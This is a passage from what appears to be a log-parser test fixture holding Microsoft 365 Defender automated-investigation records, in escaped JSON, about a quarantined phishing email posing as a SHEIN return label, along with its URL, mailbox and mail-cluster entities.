AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"RelatedAlertIds\\\":[\\\"fff21c13-c681-7398-1200-08dcf8958252\\\"],\\\"StartTimeUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"TimestampUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"\n    ],\n    \"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"TestProvider\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"EndTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"TimeGenerated\\\":\\\"2024-10-30T03:52:49.16Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"UrlReputation\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"fff21c13-c681-7398-1200-08dcf8958252\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"bb0ac18c-5081-41e0-8656-f256ba9298d0\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"InvestigationStatus\\\":\\\"Running\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fafff21c13-c681-7398-1200-08dcf8958252\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Url\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":2,\\\"Urn\\\":\\\"urn:UrlEntity:289101bb3aa22cd0464dcd3ffa7116a8\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"4\\\",\\\"Files\\\":[{\\\"$id\\\":\\\"5\\\",\\\"Name\\\":\\\"returnLabel_314378736750.pdf\\\",\\\"FileHashes\\\":[{\\\"$id\\\":\\\"6\\\",\\\"Algorithm\\\":\\\"SHA256\\\",\\\"Value\\\":\\\"F9F5D882A83CAF93B3DBEACED8FCFCCD123ABDCD141A1B5423A74E387BA74D5D\\\",\\\"Type\\\":\\\"filehash\\\"}],\\\"Type\\\":\\\"file\\\",\\\"MalwareFamily\\\":null}],\\\"Recipient\\\":\\\"test.to@ixina.com\\\",\\\"Urls\\\":[\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2BkzPoBjfVNj9CJCtsLW0zwNgmTcKgWQoyoJpwVuYlpQciOV7VFY4y40pT7PbFjZu-2BT61qNz-2FjLIbrl5IqV-2F6VA-3Dowc9_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oKxDmfijZNNeoMjhZ1voAZ4rYtu5m9xdiEh8pCCrwyFrXAffKU6vpGqbxQY4O5g0v8B7yN8HEfrFjo7Fn7G-2FQVkuoVw1L-2FcSqVGgGsGEOY4-2BG2cvJmEd1era-2FAnl53IvDmt-2FjEc5wDjePqx-2Ff9ahD7\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2B7I3RFKjR2LTj-2FCdqvCgUA-3De-zv_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6otxpVGSalyLT-2BMyMS7yEfvbLbY9v9Wjn3hkHG29S-2FBOFjoVX-2FSwv2kZeymJW-2FlgRvHCB20rH0kwYqIdOsdO-2FvuCq-2BU49-2FNEo4S2gaZRd0h3zn5MFhXxj-2F-2FbW3X5gOaGP7-2FpGN-2BX-2BHRi1Xt1JzFgCpA\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz49R6-2B-2FASLo-2BUtlyP-2F4iSjQlm-2F4HWFki90oq-2Bc29Sr-2BJAxlu_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6qR2GRWjTyLjKHBwmcXgTV-2BMq0R5qnuDMHYAbrFxAmtHiepp1aU8L-2FOCt-2BiboZksoqBfuo-2FcqBrfi9un8ILJByRUOZM3T6alRzsB1jmdLOKOZwr3m8kymuz3dFvNya6aYPmSZG4l57ycCGBya5xMMqf\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz1dNl4cyoCqQhbWGcqggHJW8SDLFVls-2FdSGWRn2n26uXgiSb-2FLZ3Oc-2F6taFyBHXTJv-2BdvE0YkDtEsaWUVnnpz7Lus9fp2MjvsYOqibyuC9Sjzgm4flo2XfvY4y5mBWuQF-2F7nM55pZ5S6S-2BSuNa5j-2BID5HJzdZOlXc2nyvbxmDFrTDuau_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oCyme2zPY6GKJBwI7FWZYrXhePHLdzV5WL-2F5EJubwqlYflj1CI9yL7Xfb24ks7WDE2wa8hQ-2BQ3h8K7-2FNpWkzEtiEQPiPEF3zOMzaOlqjkbPLg0UzpEmObjky1BycKoXMMwtfEuHLB9VnhNmDV3aIW2\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xzwS57HzRFV06M2bzMBaRY-2BtdD2HhGOqR6HD9j7eU3woqib3lW0qFsRIYtEfnDRINtIJErjGpQG2ad3jjAbAIacwJ4Le0eScR4TY1ExyusbvGQU5p_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6psejQMn2EzritsHjoZX3rBM6GN1Gt7OeDjl2fzK-2BAK5-2FzHIjoTmyFKIkBvxn4mrKqstgF5tkhF6rc-2BIL2TqH7FTpqHdxk6lMOLfZVS4DrhiP-2FvyHZwSo2RzY-2BDmTRvcBEOqOwutpZKgr0m7fArTF-2Fv\\\",\\\"http://shein.ltwebstatic.com/advertise/shein/www/images_sheIn/SheIn_logo1_1.png\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_09_2.jpg\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_11_1.jpg\\\",\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"https://fr.shein.com/\\\",\\\"https://fr.shein.com/robot\\\",\\\"https://fr.shein.com/user/order_return/order_return_label/GSONEQ62U001GKT?country=France&refund_bill_id=&return_order_id=NE91E0E8C1\\\",\\\"https://itunes.apple.com/us/app/yub-streetwear-fashion-shopping/id878577184?mt=8\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"HighConfPhish\\\"],\\\"Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1SenderDomain\\\":\\\"gmail.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P2SenderDisplayName\\\":\\\"Fanny Barriol\\\",\\\"P2SenderDomain\\\":\\\"gmail.com\\\",\\\"ReceivedDate\\\":\\\"2024-10-29T21:12:56\\\",\\\"NetworkMessageId\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"InternetMessageId\\\":\\\"<CAH2_hrsct2KwUBwRFXNs9sXxZyTJMnV2f7FxaPj2eX=7y5a2Hw@mail.gmail.com>\\\",\\\"Subject\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"Blocked\\\",\\\"ThreatDetectionMethods\\\":[\\\"UrlReputation\\\"],\\\"Language\\\":\\\"fr\\\",\\\"DeliveryLocation\\\":\\\"Quarantine\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"PhishConfidenceLevel\\\":\\\"High\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved to quarantine]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:79be71f3203d9db81f0076352eca662e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"7\\\",\\\"MailboxPrimaryAddress\\\":\\\"test.to@ixina.com\\\",\\\"Upn\\\":\\\"test.to@ixina.com\\\",\\\"AadId\\\":\\\"2011d28b-3a87-4359-b2a0-7d14f0a83828\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:f182c190672d0194477f316c5f0367e5\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,SenderIp\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;SenderIp;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;1.2.3.4;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:0b159e7db54d59b4165e81fb02f6c656\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"9\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;gmail.com;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:5e820543f7cce922d13fcc25a0ca2204\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"10\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a42bb73f2f36d917364f11fe67f0c39b\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"11\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,P2SenderDomain\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;P2SenderDomain;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;gmail.com;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a5f65badbcbc2e3c6409625436363a29\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"12\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\n    \"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n    \"EndTimeUtc\":\"2024-10-31T15:26:49\",\n    \"InvestigationId\":\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n    \"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n    \"InvestigationType\":\"ZappedUrlInvestigation\",\n    \"LastUpdateTimeUtc\":\"2024-10-31T12:59:19\",\n    \"RunningTime\":9022,\n    \"StartTimeUtc\":\"2024-10-31T12:58:22\",\n    \"Status\":\"Pending Action\"\n }"
+  },
+  "expected": {
+    "message": "{\n    \"CreationTime\":\"2024-10-31T16:24:41\",\n    \"Id\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n    \"Operation\":\"AirInvestigationData\",\n    \"OrganizationId\":\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\",\n    \"RecordType\":64,\n    \"UserKey\":\"AirInvestigation\",\n    \"UserType\":4,\n    \"Version\":1,\n    \"Workload\":\"AirInvestigation\",\n    \"ObjectId\":\"c3ebef20-fb63-4d14-b3c1-7bfb5937903a\",\n    \"UserId\":\"AirInvestigation\",\n    \"Actions\":[\n       \"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:a17bc80a136cbf4f5d4e82f43a9a3d1d\\\",\\\"InvestigationId\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ActionApproval\\\":\\\"None\\\",\\\"ActionType\\\":\\\"EmailRemediation\\\",\\\"ActionStatus\\\":\\\"Pending\\\",\\\"Entities\\\":[{\\\"$id\\\":\\\"2\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"RelatedAlertIds\\\":[\\\"fff21c13-c681-7398-1200-08dcf8958252\\\"],\\\"StartTimeUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"LastUpdateTimeUtc\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"TimestampUtc\\\":\\\"2024-10-31T13:33:19\\\",\\\"BulkName\\\":\\\"Mail with malicious urls is zapped - 